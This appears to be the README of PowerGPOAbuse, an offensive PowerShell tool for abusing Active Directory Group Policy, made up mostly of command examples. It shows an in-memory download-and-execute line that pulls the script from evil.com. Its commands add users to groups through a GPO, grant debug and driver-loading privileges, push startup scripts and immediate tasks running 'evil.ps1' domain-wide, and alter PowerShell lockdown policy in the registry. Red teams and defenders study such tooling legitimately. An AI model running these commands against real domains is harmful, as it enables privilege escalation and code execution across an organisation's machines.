Powershell version of SharpGPOAbuse for those who can't compile or if their C2 can't execute .NET Assembly straightly from memory. Highly inspired by the original C# version and the amazing PowerView.
-
PS> Import-Module .\PowerGPOAbuse.ps1
-
PS> . .\PowerGPOAbuse.ps1
-
PS> IEX (New-Object System.Net.WebClient).DownloadString('https://evil.com/PowerGPOAbuse.ps1')
-
Those function are designed for exploitation function, but they can be used to quick recon. They not aim to replace PowerView's one.
-
List users
PS> Get-DomainUser
-
List groups
PS> Get-DomainGroup
-
List GPOs
PS> Get-DomainGPO
-
List OUs
PS> Get-DomainOU
-
List DCs
PS> Find-DomainController
-
Changing GPO status
PS> Set-DomainGPOStatus -GPOIdentity "SuperSecureGPO" -Status "AllSettingsDisabled"
-
Creating a new GPLink
PS> New-DomainGPLink -GPOIdentity "SuperSecureGPO" -OUIdentity "SecureUsers" -Status "LinkEnabled"
-
Changing the status of a GPLink
PS> New-DomainGPLink -GPOIdentity "SuperSecureGPO" -OUIdentity "SecureUsers" -Status "LinkEnabled"
-
Adding a user to a group
PS> Add-GPOGroupMember -Member 'Bobby' -GPOIdentity 'SuperSecureGPO'
-
Assign a new right
PS> Add-GPOUserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'
-
Adding a new Computer/User script
PS> Add-GPOStartupScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO' -Scope Computer/User
-
Create an new Computer/User immediate task
PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User
-
Adding a new registry key
PS> Add-GPORegistryPreference -GPOIdentity SuperSecureGPO -RegistryPath "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -RegistryKey "__PSLockdownPolicy" -RegistryValue "4" -RegistryValueType String -RegistryAction Create
-
Create a new GPO
PS> New-DomainGPO -DisplayName SuperSecureGPO -Domain testlab.local
-
Delete a GPO
PS> Remove-DomainGPO -GPOIdentity SuperSecureGPO -RemoveFile
-
Add-LocalAdmin
->Add-GPOGroupMember
-
Add-UserRights
->AddGPOUserRights
-
Add-Script
->Add-GPOStartupScript
-
Add-Task
->Add-GPOImmediateTask
-
Add-RegistryValue
->Add-GPORegistryPreference
Reverse functions, Backup Operator weaponization, stability, optimisation and new exploitation functions.
if you find any bugs, idea to improve the script, or any feedback, feel free raise an issue or propose a pull requests !